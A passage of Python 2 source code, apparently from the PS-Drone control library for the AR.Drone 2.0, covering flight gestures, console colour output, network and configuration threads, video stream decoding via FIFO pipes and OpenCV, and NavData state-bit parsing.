def angleDiff(self, base, value):
adiff = ((base+180)-(value+180)) %360
if adiff>180: adiff-=360
return adiff
# Grabs the pressed key (not yet for Windows)
# ToDo: Reprogram for Windows
def getKey(self):
key = ""
fd = sys.stdin.fileno()
if os.name == 'posix':
oldterm = termios.tcgetattr(fd)
newattr = termios.tcgetattr(fd)
newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
termios.tcsetattr(fd, termios.TCSANOW, newattr)
oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
try:
try: key = sys.stdin.read(1)
except IOError: pass
finally:
termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
if os.name == 'nt':
if msvcrt.kbhit(): key = msvcrt.getch()
key += self.__vKey
self.__vKey = ""
return key
# Drone hops like an excited dog
def doggyHop(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveUp()
time.sleep(0.20)
self.moveDown()
time.sleep(0.20)
self.hover()
self.__speed = ospeed
# Drone wags like a happy dog
def doggyWag(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveLeft()
time.sleep(0.25)
self.moveRight()
time.sleep(0.25)
self.hover()
self.__speed = ospeed
# Drone nods
def doggyNod(self):
ospeed = self.__speed
self.__speed = 1
for i in range (0,4,1):
self.moveForward()
time.sleep(0.25)
self.moveBackward()
time.sleep(0.25)
self.hover()
self.__speed = ospeed
def printDefault(self, *args):
if os.name == 'posix':
print self.__pDefaultStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printRed(self, *args):
if os.name == 'posix':
print self.__pRedStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printGreen(self, *args):
if os.name == 'posix':
print self.__pGreenStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printYellow(self, *args):
if os.name == 'posix':
print self.__pYellowStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printBlue(self, *args):
if os.name == 'posix':
print self.__pBlueStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printPurple(self, *args):
if os.name == 'posix':
print self.__pPurpleStr,
if len(args) > 0:
for i in args: print i,
print self.__pDefaultStr
def printLineUp(self):
if os.name == 'posix': print self.__pLineUpStr,
##################################=-
### Threads & Thread-Sidekicks ###=-
##################################=-
# Idea: the network thread listens to the given network-stream and communication-pipes of other processes, such as for video or navdata-decoding.
# In case the connection to the drone is cut off for more than 2 seconds (so no keep-alive-command has been sent) the network
# needs to reconnect. In order to do so the (private) function "__netrecon" starts after 0.1 seconds of no incoming navdata-datapacket to
# reconnect all given network-sockets.
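# Minimal sketch of that multiplexing idea (illustrative names; see __receiveData below):
#   readable, _, _ = select.select([navdata_pipe, video_pipe, config_socket], [], [], 0.1)
#   for src in readable:
#       handle(src.recv())
# One thread serves all child processes by draining whichever pipe or socket is ready.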
def __heartbeat(self):
# If the drone does not get a command, it will mutter after 50ms (CTRL watchdog / state[28] will set to 1)
# and panic after 2 seconds and abort data-communication on port 5554 (then you have to initialize the network again).
# Heartbeat will reset the watchdog and, by the way, the ACK_BIT (state[6], to accept any other AT*CONFIG command)
# If mainthread isn't alive anymore (because program crashed or whatever), heartbeat will initiate the shutdown.
if str(threading.enumerate()).count("MainThread, stopped") or str(threading.enumerate()).count("MainThread")==0: self.shutdown()
else: self.at("COMWDG",[])
# CheckAndReact is periodically called by the receiveData-Thread to check mainly for critical status-error(s) and
# changed debug-modes.
def __checkAndReact(self, debug, showCommands):
# Automatic process-commands, used for syncing debugging-bits to child-processes
if debug != self.debug:
debug = self.debug
if debug:
self.__NavData_pipe.send("debug")
self.__Video_pipe.send("debug")
else:
self.__NavData_pipe.send("undebug")
self.__Video_pipe.send("undebug")
if showCommands != self.showCommands:
showCommands = self.showCommands
if showCommands:
self.__NavData_pipe.send("showCommands")
self.__Video_pipe.send("showCommands")
else:
self.__NavData_pipe.send("hideCommands")
self.__Video_pipe.send("hideCommands")
# Communication problem, shutting down
if self.stopOnComLoss and self.__State[30]:
self.shutdown()
sys.exit()
return (debug,showCommands)
# Thread for sending the configuration. It is asynchronous but safe.
# The configuration-requests are held in a queue and the first entry is sent. NavData will contain a "Control command ACK" status-bit,...
# ...signalling that the configuration is ready to be set. This is confirmed and the procedure waits until the bit is 0 again; then the next entry is processed.
# In safe-mode, there is a check whether the configuration has been changed correctly by requesting the current/latest configuration and double-checking the value.
def __sendConfig(self):
sleeptime, getconfigtag, self.__sendConfigRunning = 0.001, False, True
while not self.__networksuicide:
if len(self.__ConfigQueue): # If there is something in the queue...
if self.__ConfigQueue[0][-1]: self.sendConfigIDs() # ...check for multiuserconfig-request (and send it)
self.__ConfigSending = True # Set tag, to show sending is in process
qlen = len(self.__ConfigQueue)
if qlen > 1: # Testing for double entries, preventing a ping-pong in save-mode
i = 1
while True:
if i >= qlen: break
if self.__ConfigQueue[0][0].lower() == self.__ConfigQueue[i][0].lower():
self.__ConfigQueue.remove(self.__ConfigQueue[0])# Delete double entries
qlen = len(self.__ConfigQueue)
else: i+=1
self.at("CONFIG",self.__ConfigQueue[0][:-1]) # Send the first entry in queue
getconfigtag, configconfirmed, configreconfirmed = False, False, False
while not configconfirmed and not self.__networksuicide: # Wait for confirmation-bit from drone...
if self.__State[6] and not configreconfirmed and not self.__networksuicide:
self.at("CTRL",[5,0]) # ...and send reset the confirmation-bit
configreconfirmed = True
if not self.__State[6] and configreconfirmed and not self.__networksuicide:
configconfirmed = True # Wait for the reset of the confirmation-bit
time.sleep(sleeptime)
# It seems that the drone does not always store configurations correctly; therefore, here is a safe-mode:
if self.sendConfigSaveMode and not self.__networksuicide:
lastConfigDataCount = self.__ConfigDataCount # Wait for the next configuration-list
self.getConfig()
while lastConfigDataCount == self.__ConfigDataCount and not self.__networksuicide: time.sleep(sleeptime)
# New & Optimized
for i in range (0,len(self.__ConfigData),1):
if self.__ConfigData[i][0].find(self.__ConfigQueue[0][0]) > -1:
if self.__ConfigData[i][1] != self.__ConfigQueue[0][1]:
if self.debug:
print " Configuration missmatched, resending !"
print " "+self.__ConfigData[i][0]+" should be \""+self.__ConfigQueue[0][1]+"\" is \""+self.__ConfigData[i][1]+"\""
self.__ConfigQueue.append(self.__ConfigQueue[0]) # If value is not correctly set, requeue !
self.__ConfigQueue.remove(self.__ConfigQueue[0]) # Configuration has been (correctly) set, delete request from queue and go on
if self.__networksuicide: self.__ConfigQueue=[]
if not len(self.__ConfigQueue):
if not getconfigtag:
self.getConfig()
getconfigtag = True
self.__ConfigSending = False
else: time.sleep(sleeptime)
if self.debug: print "sendConfig-Tread : committed suicide"
def __receiveData(self):
self.__net_pipes=[]
self.__net_pipes.append(self.__NavData_pipe)
self.__net_pipes.append(self.__Video_pipe)
self.__Config_pipe = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #TCP
self.__Config_pipe.setblocking(0)
self.__Config_pipe.connect_ex((self.DroneIP, self.CTLPort))
self.__net_pipes.append(self.__Config_pipe)
VideoIsDead, configdata, cfgdata, cmd = False, [], "", ""
vDecodeRunning, debug, showCommands, self.__receiveDataRunning = False, False, False, True
while not self.__networksuicide:
in_pipe, dummy1, dummy2 = select.select(self.__net_pipes, [], [], 0.1) # When something is in a pipe...
for ip in in_pipe: # ...go and get it
if ip == self.__NavData_pipe: ### Receiving sensor-values from NavData-process
self.__NavData, self.__State, self.__NavDataCount, self.__NavDataTimeStamp, self.__NavDataDecodingTime, self.__NoNavData = self.__NavData_pipe.recv()
if ip == self.__vdecode_pipe: ### Receiving imagedata and feedback from videodecode-process
cmd, VideoImageCount, VideoImage, VideoDecodeTime = self.__vdecode_pipe.recv() # Imagedata
if self.showCommands and cmd!="Image" : print "** vDec -> Com :",cmd
if cmd == "suicided": self.__Video_pipe.send("vd died") # videodecode-process died
if cmd == "foundCodec": self.__Video_pipe.send("foundCodec") # the codec of the videostream has been found, do not flood anymore
if cmd == "VideoUp": self.__VideoReady = True # Imagedata is available
if cmd == "keypressed": self.__vKey = VideoImage # Pressed key on window
if cmd == "reset": self.__Video_pipe.send(cmd) # proxy to videodecode-process
if cmd == "Image": # Imagedata !
self.__VideoImageCount = VideoImageCount
self.__VideoImage = VideoImage
self.__VideoDecodeTime = VideoDecodeTime
self.__VideoDecodeTimeStamp = time.time()-self.__startTime
if ip == self.__Video_pipe: ### Receiving feedback from videostream-process
cmd = self.__Video_pipe.recv()
if self.showCommands and cmd != "": print "** Vid -> Com : ",cmd
if cmd == "vDecProc": # videodecode-process should start
if not vDecodeRunning:
try:
if self.__vDecodeProcess == True: pass
except: self.__vDecodeProcess = multiprocessing.Process( target=vDecode, args=(self.__VidPipePath,self.__vdecodeChild_pipe,os.getpid()))
self.__vDecodeProcess.start()
self.__net_pipes.append(self.__vdecode_pipe)
vDecodeRunning = True
self.__Video_pipe.send("vDecProcON")
# else: self.__vdecode_pipe.send(cmd) # If / elif / else is somehow not working here...whyever
if cmd == "VideoDown": self.__VideoReady=False # videodecode-process stopped
if cmd == "saveVideo": self.__SaveVideo=True # no preprocessing of the video
if cmd == "unsaveVideo": self.__SaveVideo=False # preprocessing activated again
if cmd == "debug": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "showCommands": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "hideCommands": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "show": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "hide": self.__vdecode_pipe.send(cmd) # proxy to videodecode-process
if cmd == "vDecProcKill":
self.__vdecode_pipe.send("die!") # videodecode-process should switch off
vDecodeRunning = False
if ip==self.__Config_pipe and not self.__networksuicide: ### Receiving drone-configuration
try:
if self.__networksuicide: break # Does not stop sometimes, so the loop will be forced to stop
cfgdata = cfgdata+self.__Config_pipe.recv(65535) # Data comes in two or three packages
if cfgdata.count("\x00"): # Last byte of sent config-file, everything was received
if self.__networksuicide: break
configdata = (cfgdata.split("\n")) # Split the huge package into a configuration-list
for i in range(0, len(configdata), 1):
configdata[i] = configdata[i].split(" = ") # Split the single configuration-lines into configuration and value
self.__ConfigData = configdata[:-1] # Last value is "\x00"
self.__ConfigDataTimeStamp = time.time()-self.__startTime # Set a timestamp for a better coordination
self.__ConfigDataCount+=1 # Alters the count of received Configdata for a better coordination
configdata, cfgdata = [], ""
if self.showCommands: print "Got "+str(len(self.__ConfigData))+" Configdata "+str(time.time()-self.__calltime)
self.__calltime=0
except IOError: pass
debug, showCommands = self.__checkAndReact(debug, showCommands) # Check for errors and things to change
if self.debug: print "receiveData-Thread : committed suicide"
def __stopnetwork(self):
self.__networksuicide = True
#############################=-
### Compatibility Commands ###=-
#############################=-
# While programming this API I changed some command-names
# This section converts the old commands into the new ones
def pwm(self, fl, fr, rl, rr): # Controls engines directly, overriding control loops.
if fl > 64000: fl = 64000
if fr > 64000: fr = 64000
if rl > 64000: rl = 64000
if rr > 64000: rr = 64000
self.at("PWM", [int(fl), int(fr), int(rr), int(rl)])
def groundVideo(self, *args): self.groundCam(*args)
def frontVideo(self, *args): self.frontCam(*args)
###############################################################################
### Internal Subfunctions
###############################################################################
def __checkSpeedValue(self,value):
try:
speed = float(value)
if self.valueCorrection:
speed = max(-1.0,speed)
speed = min( 1.0,speed)
except: speed = self.__speed
return speed
# Checks the inputs for the right length
def normalLen8(value):
value, zero = str(value), "00000000"
vlen = min(len(value),8)
normal = zero[0:8-vlen] + value[0:8]
return normal[0:8].lower()
##################################################################################################
###### Receive and Decode Video ######
##################################################################################################
# If the ps_drone-process has crashed, recognize it and kill yourself
def watchdogV(parentPID, ownPID):
global commitsuicideV
while not commitsuicideV:
time.sleep(1)
try : os.getpgid(parentPID)
except:
try: subprocess.Popen(["kill",str(os.getpid())],stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
except: pass
# Thread to capture, decode and display the video-stream
def vCapture(VidPipePath, parent_pipe):
import cv2
global vCruns, commitsuicideV, showVid, lockV, debugV
# cv2.startWindowThread()
show = False
hide = True
vCruns = True
t = time.time()
parent_pipe.send(("VideoUp",0,0,0))
capture = cv2.VideoCapture(VidPipePath)
ImgCount = 0
if debugV: print "CAPTURE: "+str(time.time()-t)
time.sleep(0.1)
parent_pipe.send(("foundCodec",0,0,0))
declag = time.time()
count = -3
imageXsize = 0
imageYsize = 0
windowName = "PS-Drone"
codecOK = False
lastKey = ""
cc=0
'''
while not commitsuicideV:
decTimeRev = time.time()
receiveWatchdog = threading.Timer(2.0, VideoReceiveWatchdog, [parent_pipe,"vCapture", debugV]) # Resets video if something hangs
receiveWatchdog.start()
success, image = capture.read()
##################################
#img_process(image)
cc+=1
receiveWatchdog.cancel()
decTime = decTimeRev-time.time()
tlag = time.time()-declag
if not codecOK:
if image.shape[:2]==(360,640) or image.shape[:2]==(368,640) or image.shape[:2]==(720,1280) or image.shape[:2]==(1080,1920):
codecOK = True
if debugV: print "Codec seems OK"
else:
if debugV: print "Codec failure"
parent_pipe.send(("reset",0,0,0))
commitsuicideV = True
if codecOK:
if not (imageXsize == image.shape[1]) or not (imageYsize == image.shape[0]):
cv2.destroyAllWindows()
imageYsize, imageXsize = image.shape[:2]
windowName = "PS-Drone - "+str(imageXsize)+"x"+str(imageYsize)
if success:
if tlag > 0.02: count+=1
if count > 0:
ImgCount+=1
if not show and not hide:
cv2.destroyAllWindows()
hide = True
if show:
cv2.imshow(windowName, image)
key=cv2.waitKey(1)
if key>-1: parent_pipe.send(("keypressed",0,chr(key%256),0))
parent_pipe.send(("Image",ImgCount,image,decTime))
else: time.sleep(0.01)
declag = time.time()
if showVid:
if not show:
show=True
cv2.destroyAllWindows()
else:
if show:
show=False
cv2.destroyAllWindows()
vCruns = False
cv2.destroyAllWindows()
capture.release()
if debugV: print "vCapture-Thread : committed suicide"
'''
### Process to decode the videostream in the FIFO-pipe, stored there by the main loop.
# Storing and decoding must not run in the same process; that's why decoding is external.
# vDecode controls the vCapture-thread, which finally captures and decodes the videostream.
def vDecode(VidPipePath, parent_pipe, parentPID):
global vCruns, commitsuicideV, showVid, lockV, debugV
showCommands = False
Thread_vCapture = threading.Thread(target=vCapture, args=(VidPipePath,parent_pipe))
Thread_vCapture.start()
Thread_watchdogV = threading.Thread(target=watchdogV, args=[parentPID,os.getpid()])
Thread_watchdogV.start()
while not commitsuicideV:
in_pipe, out_pipe, dummy2 = select.select([parent_pipe], [], [], 0.1) # When something is in a pipe...
cmd = parent_pipe.recv()
if showCommands: print "** Com -> vDec : ",cmd
if cmd == "die!": commitsuicideV = True
elif cmd == "reset": commitsuicideV = True
elif cmd == "show": showVid = True
elif cmd == "hide": showVid = False
elif cmd == "debug":
debugV = True
print "vDecode-Process : running"
if vCruns: print "vCapture-Thread : running"
elif cmd == "undebug": debugV = False
elif cmd == "showCommands": showCommands = True
elif cmd == "hideCommands": showCommands = False
Thread_vCapture.join()
parent_pipe.send(("suicided",0,0,0))
time.sleep(0.1)
if debugV: print "vDecode-Process : committed suicide"
#####################################################
def VideoReceiveWatchdog(parent_pipe,name, debugV):
if debugV: print "WHATCHDOG reset von",name
parent_pipe.send(("reset",0,0,0))
def mainloopV(DroneIP, VideoPort, VidPipePath, parent_pipe, parentPID):
inited, preinited, suicide, debugV, showCommands, slowVideo = False, False, 0, False, False, False
rawVideoFrame, VidStreamSnippet, VidStreamSnippetAvalible, iFrame, FrameCount = "", "", False, False, 0
saveVideo, unsureMode, searchCodecTime, frameRepeat, burstFrameCount = False, True, 0, 1, 0
reset, resetCount, commitsuicideV, foundCodec = False, 0, False, False
vstream_pipe, pipes = None, [parent_pipe]
vdecode_pipe, vdecode_childpipe = multiprocessing.Pipe()
pipes.append(vdecode_pipe)
Thread_watchdogV = threading.Thread(target=watchdogV, args=[parentPID,os.getpid()])
Thread_watchdogV.start()
while not commitsuicideV:
in_pipe, out_pipe, dummy2 = select.select(pipes, [], [], 0.1) # When something is in a pipe...
for ip in in_pipe:
if ip == parent_pipe:
cmd = parent_pipe.recv()
if showCommands: print "** Com -> Vid : ",cmd
if cmd == "die!":
if inited:
suicide = True
parent_pipe.send("vDecProcKill")
dummy = 0
else: commitsuicideV = True
elif cmd == "foundCodec": foundCodec = True
elif cmd == "reset" and not reset:# and resetCount<3:
inited, preinited, foundCodec = False, False, False
rawVideoFrame, VidStreamSnippet = "", ""
VidStreamSnippetAvalible = False
iFrame, FrameCount, reset = False, 0, True
unsureMode, searchCodecTime = True, 0
burstFrameCount = 0
resetCount += 1
parent_pipe.send("vDecProcKill")
elif cmd == "slowVideo":
slowVideo = True
frameRepeat = 1
elif cmd == "midVideo":
slowVideo = True
frameRepeat = 4
elif cmd == "fastVideo":
slowVideo = False
frameRepeat = 1
elif cmd == "saveVideo":
saveVideo = True
parent_pipe.send("saveVideo")
elif cmd == "unsaveVideo":
saveVideo = False
parent_pipe.send("unsaveVideo")
elif cmd == "showCommands":
showCommands = True
parent_pipe.send("showCommands")
elif cmd == "hideCommands":
showCommands = False
parent_pipe.send("hideCommands")
elif cmd == "debug":
debugV = True
print "Video-Process : running"
parent_pipe.send("debug")
elif cmd == "undebug":
debugV = False
parent_pipe.send("undebug")
elif cmd == "init" and not inited and not preinited:
preinited = True
try: os.mkfifo(VidPipePath)
except: pass
parent_pipe.send("vDecProc")
elif cmd == "vDecProcON":
rawVideoFrame = ""
VidStreamSnippet = ""
iFrame = False
FrameCount = 0
foundCodec = False
searchCodecTime = 0
if not vstream_pipe:
vstream_pipe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
vstream_pipe.setblocking(0)
vstream_pipe.connect_ex((DroneIP,VideoPort))
pipes.append(vstream_pipe)
write2pipe = open(VidPipePath,"w+")
suicide = False
inited = True
preinited = False
unsureMode = True
elif cmd == "uninit" and inited:
parent_pipe.send("vDecProcKill")
elif cmd == "vd died":
if inited and not reset:
pipes.remove(vstream_pipe)
vstream_pipe.shutdown(socket.SHUT_RDWR)
vstream_pipe.close()
write2pipe.close()
inited = False
if suicide: commitsuicideV = True
parent_pipe.send("VideoDown")
try: os.remove(VidPipePath)
except: pass
if not inited and reset:
try: os.mkfifo(VidPipePath)
except: pass
parent_pipe.send("VideoDown")
parent_pipe.send("vDecProc")
parent_pipe.send("debug")
reset = False
burstFrameCount = 0
else:
parent_pipe.send(cmd)
### Grabs the Videostream and store it in a fifo-pipe for decoding.
# The decoder has to guess the videostream-format which takes around 266 video-frames.
# So the stream is preprocessed, I-Frames will cut out while initiation and a flood of copies
# will be send to the decoder, till the proper decoder for the videostream is found.
# In case of a slow or midspeed-video, only a single or a few copied I-frames are sent to the decoder.
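# Illustrative note on the logic below: while foundCodec is False, every buffered I-frame is
# written about five times to the FIFO (tracked via burstFrameCount), so cv2.VideoCapture in
# vCapture can lock onto the h264 stream much sooner than the usual ~266 frames.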
if ip == vstream_pipe:
receiveWatchdog = threading.Timer(2.0, VideoReceiveWatchdog, [parent_pipe,"Video Mainloop", debugV,]) # Resets video if something hangs
receiveWatchdog.start()
videoPackage = vstream_pipe.recv(65535)
receiveWatchdog.cancel()
if len(videoPackage) == 0: commitsuicideV = True
else:
if inited and not reset:
if unsureMode: ### An MPEG4-Stream is not confirmed, fallback to savemode ?
if not searchCodecTime and not len(VidStreamSnippet): # Video is freshly initiated
searchCodecTime = time.time()
if (time.time()-searchCodecTime) < 0.15: # Collecting VidStreamSnippet for later use
VidStreamSnippet+=videoPackage
if (time.time()-searchCodecTime) > 2.0: # Waited too long for an MPEG4 stream confirmation...
saveVideo = True # ... fall back to savemode
parent_pipe.send("saveVideo") # Inform the main process
unsureMode = False
foundCodec = True # switch off codec guess speed-up
if not saveVideo:
# if len(videoPackage) == 0: commitsuicideV = True
# else:
if videoPackage[31:40].find("\x00\x00\x00")>3: # Found a new MPEG4-Frame
FrameCount+=1
### Processing the last frame
if iFrame: # If the last frame was an I-frame
VidStreamSnippet = rawVideoFrame # ... save it as VideoStreamSnippet for later use
if foundCodec: # OpenCV guessed the used Codec
if slowVideo: # Send just the iFrame (openCV stores about 5 in its queue),
for i in range(0,frameRepeat,1): # ... so repeat for less delay in midVideo()-mode
write2pipe.write(VidStreamSnippet)
iFrame = False
else: pass
if not slowVideo: # For all last Frames
if foundCodec:
try: write2pipe.write(rawVideoFrame)
except: pass
if not foundCodec: # Flood the pipe with the last iFrames, so that openCV can guess the codec faster
for i in range(0,5):
try:
write2pipe.write(rawVideoFrame)
burstFrameCount+=1
except: pass
### Processing new Frames
if ord(videoPackage[30]) == 1: #### Found an I-Frame
rawVideoFrame = "" # Delete the data previous to the first iFrame
unsureMode,iFrame = False, True
elif ord(videoPackage[30]) == 3: #### Found a P-Frame
unsureMode = False
else: #### Found an odd h264-frametype
if debugV:
print "*** Odd h264 Frametype: ",FrameCount,
for i in range(31,43,1): print ord(videoPackage[i]),
print " - ",videoPackage[31:40].find("\x00\x00\x00"),ord(videoPackage[30])
rawVideoFrame = ""
### Collecting data for the next frame from stream
rawVideoFrame+=videoPackage
else: #(saveVideo-Mode)
if foundCodec: write2pipe.write(videoPackage)
else:
for i in range(0,2):
write2pipe.write(VidStreamSnippet)
burstFrameCount+=1
if not foundCodec and burstFrameCount>350:
parent_pipe.send(("reset",0,0,0))
burstFrameCount=0
if debugV: print "To many pictures send while guessing the codec. Resetting."
try:
vstream_pipe.shutdown(socket.SHUT_RDWR)
vstream_pipe.close()
except: pass
try: write2pipe.close()
except: pass
try: vstream_pipe.close()
except: pass
try:
VidPipe=open(VidPipePath,"r")
r = "1"
while len(r): r=VidPipe.read()
VidPipe.close()
except: pass
try: os.remove(VidPipePath)
except: pass
if debugV: print "Video-Process : committed suicide"
##################################################################################################
###### Receive and Decode NavData ######
##################################################################################################
### Description:
### It follows lousy code for abetter documentation! Later there will be lousy code because of laziness; I will correct it later....maybe.
### You will (normally) find the names of the official AR.drone SDK 2.0, some comments and the official data type of that value.
### A lot of entries are reverse engineered; for some, I have no idea what they do or what their meaning is.
### It would be nice if you could give me a hint if you have some further information.
##### Header ##################################################################
def decode_Header(data):
#Bit 00-07: FLY_MASK, VIDEO_MASK, VISION_MASK, CONTROL_MASK, ALTITUDE_MASK, USER_FEEDBACK_START, COMMAND_MASK, CAMERA_MASK
#Bit 08-15: TRAVELLING_MASK, USB_MASK, NAVDATA_DEMO_MASK, NAVDATA_BOOTSTRAP, MOTORS_MASK, COM_LOST_MASK, SOFTWARE_FAULT, VBAT_LOW
#Bit 16-23: USER_EL, TIMER_ELAPSED, MAGNETO_NEEDS_CALIB, ANGLES_OUT_OF_RANGE, WIND_MASK, ULTRASOUND_MASK, CUTOUT_MASK, PIC_VERSION_MASK
#Bit 24-31: ATCODEC_THREAD_ON, NAVDATA_THREAD_ON, VIDEO_THREAD_ON, ACQ_THREAD_ON, CTRL_WATCHDOG_MASK, ADC_WATCHDOG_MASK, COM_WATCHDOG_MASK, EMERGENCY_MASK
stateBit = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
stateBit[ 0] = data[1] &1 # 0: FLY MASK : (0) ardrone is landed, (1) ardrone is flying
stateBit[ 1] = data[1]>> 1&1 # 1: VIDEO MASK : (0) video disable, (1) video enable
stateBit[ 2] = data[1]>> 2&1 # 2: VISION MASK : (0) vision disable, (1) vision enable
stateBit[ 3] = data[1]>> 3&1 # 3: CONTROL ALGO : (0) euler angles control, (1) angular speed control
stateBit[ 4] = data[1]>> 4&1 # 4: ALTITUDE CONTROL ALGO : (0) altitude control inactive (1) altitude control active
stateBit[ 5] = data[1]>> 5&1 # 5: USER feedback : Start button state
stateBit[ 6] = data[1]>> 6&1 # 6: Control command ACK : (0) None, (1) one received
stateBit[ 7] = data[1]>> 7&1 # 7: CAMERA MASK : (0) camera not ready, (1) Camera ready
stateBit[ 8] = data[1]>> 8&1 # 8: Travelling mask : (0) disable, (1) enable
stateBit[ 9] = data[1]>> 9&1 # 9: USB key : (0) usb key not ready, (1) usb key ready
stateBit[10] = data[1]>>10&1 # 10: Navdata demo : (0) All navdata, (1) only navdata demo
stateBit[11] = data[1]>>11&1 # 11: Navdata bootstrap : (0) options sent in all or demo mode, (1) no navdata options sent
stateBit[12] = data[1]>>12&1 # 12: Motors status : (0) Ok, (1) Motors problem
stateBit[13] = data[1]>>13&1 # 13: Communication Lost : (0) Com is ok, (1) com problem
stateBit[14] = data[1]>>14&1 # 14: Software fault detected - user should land as quick as possible (1)
stateBit[15] = data[1]>>15&1 # 15: VBat low : (0) Ok, (1) too low
stateBit[16] = data[1]>>16&1 # 16: User Emergency Landing : (0) User EL is OFF, (1) User EL is ON
stateBit[17] = data[1]>>17&1 # 17: Timer elapsed : (0) not elapsed, (1) elapsed
stateBit[18] = data[1]>>18&1 # 18: Magnetometer calib state : (0) Ok, no calibration needed, (1) not ok, calibration needed
stateBit[19] = data[1]>>19&1 # 19: Angles : (0) Ok, (1) out of range
stateBit[20] = data[1]>>20&1 # 20: WIND MASK: (0) Ok, (1) Too much wind
stateBit[21] = data[1]>>21&1 # 21: Ultrasonic sensor : (0) Ok, (1) deaf
stateBit[22] = data[1]>>22&1 # 22: Cutout system detection : (0) Not detected, (1) detected
stateBit[23] = data[1]>>23&1 # 23: PIC Version number OK : (0) a bad version number, (1) version number is OK
stateBit[24] = data[1]>>24&1 # 24: ATCodec thread ON : (0) thread OFF, (1) thread ON
stateBit[25] = data[1]>>25&1 # 25: Navdata thread ON : (0) thread OFF, (1) thread ON
stateBit[26] = data[1]>>26&1 # 26: Video thread ON : (0) thread OFF, (1) thread ON
stateBit[27] = data[1]>>27&1 # 27: Acquisition thread ON : (0) thread OFF, (1) thread ON
stateBit[28] = data[1]>>28&1 # 28: CTRL watchdog : (0) control is well scheduled, (1) delay in control execution (> 5ms)
stateBit[29] = data[1]>>29&1 # 29: ADC Watchdog : (0) uart2 is good, (1) delay in uart2 dsr (> 5ms)
stateBit[30] = data[1]>>30&1 # 30: Communication Watchdog : (0) Com is ok, (1) com problem
stateBit[31] = data[1]>>31&1 # 31: Emergency landing : (0) no emergency, (1) emergency
stateBit[32] = data[2]
stateBit[33] = data[3]
# Alternative code:
# for i in range (0,32,1): arState[i]=data>>i&1
return (stateBit)
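# Illustrative sketch (not part of the original library): decode_Header() above just
# shifts and masks the 32-bit drone-state word. The helper below shows the same bit
# arithmetic on its own; the name _example_state_bits and the sample value are
# assumptions made purely for demonstration.
def _example_state_bits(state_word=0x00000285):
	flying       = state_word     & 1	# bit 0: FLY_MASK
	vision       = state_word>> 2 & 1	# bit 2: VISION_MASK
	camera_ready = state_word>> 7 & 1	# bit 7: CAMERA_MASK
	usb_ready    = state_word>> 9 & 1	# bit 9: USB_MASK
	return (flying, vision, camera_ready, usb_ready)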
##### ID = 0 ### "demo" #######################################################
def decode_ID0(packet): # NAVDATA_DEMO_TAG
dataset = struct.unpack_from("HHIIfffifffIffffffffffffIIffffffffffff", packet, 0)
if dataset[1] != 148: print "*** ERROR : Navdata-Demo-Options-Package (ID=0) has the wrong size !!!"
demo=[[0,0,0,0,0,0,0,0,0,0,0,0],0,[0,0,0],0,[0,0,0],0,[0,0,0,0,0,0,0,0,0],[0,0,0],0,0,[0,0,0,0,0,0,0,0,0],[0,0,0]]
demo[0][ 0] = dataset[2]>>15&1 # DEFAULT (bool)
demo[0][ 1] = dataset[2]>>16&1 # INIT (bool)
demo[0][ 2] = dataset[2]>>17&1 # LANDED (bool)
demo[0][ 3] = dataset[2]>>18&1 # FLYING (bool)
demo[0][ 4] = dataset[2]>>19&1 # HOVERING (bool) (Seems like landing)
demo[0][ 5] = dataset[2]>>20&1 # TEST (bool)
demo[0][ 6] = dataset[2]>>21&1 # TRANS_TAKEOFF (bool)
demo[0][ 7] = dataset[2]>>22&1 # TRANS_GOFIX (bool)
demo[0][ 8] = dataset[2]>>23&1 # TRANS_LANDING (bool)
demo[0][ 9] = dataset[2]>>24&1 # TRANS_LOOPING (bool)
demo[0][10] = dataset[2]>>25&1 # TRANS_NO_VISION (bool)
demo[0][11] = dataset[2]>>26&1 # NUM_STATE (bool)
demo[1] =dataset[3] # vbat_flying_percentage battery voltage (filtered) in percent (uint32)
demo[2][0] =dataset[4]/1000.0 # theta pitch in degrees (float)
demo[2][1] =dataset[5]/1000.0 # phi roll in degrees (float)
demo[2][2] =dataset[6]/1000.0 # psi yaw in degrees (float)
demo[3] =dataset[7]/10.0 # altitude altitude in centimetres (int32)
demo[4][0] =dataset[8] # vx estimated speed in X in mm/s (float)
demo[4][1] =dataset[9] # vy estimated speed in Y in mm/s (float)
demo[4][2] =dataset[10] # vz estimated speed in Z in mm/s (float)
demo[5] =dataset[11] # num_frames streamed frame index (uint32) (Not used to integrate in video stage)
for i in range (0,9,1): demo[6][i] = dataset[12+i] # detection_camera_rot Camera parameters compute by detection (float matrix33)
for i in range (0,3,1): demo[7][i] = dataset[21+i] # detection_camera_trans Deprecated ! Don't use ! (float vector31)
demo[8] = dataset[24] # detection_tag_index Deprecated ! Don't use ! (uint32)
demo[9] = dataset[25] # detection_camera_type Type of tag (uint32)
for i in range (0,9,1): demo[10][i] = dataset[26+i] # drone_camera_rot Camera parameters computed by drone (float matrix33)
for i in range (0,3,1): demo[11][i] = dataset[35+i] # drone_camera_trans Deprecated ! Don't use ! (float vector31)
return(demo)
##### ID = 1 ### "time" #######################################################
def decode_ID1(packet): #NAVDATA_TIME_TAG
dataset = struct.unpack_from("HHI", packet, 0)
if dataset[1] != 8: print "*** ERROR : navdata-time-Options-Package (ID=1) has the wrong size !!!"
time=[0.0]
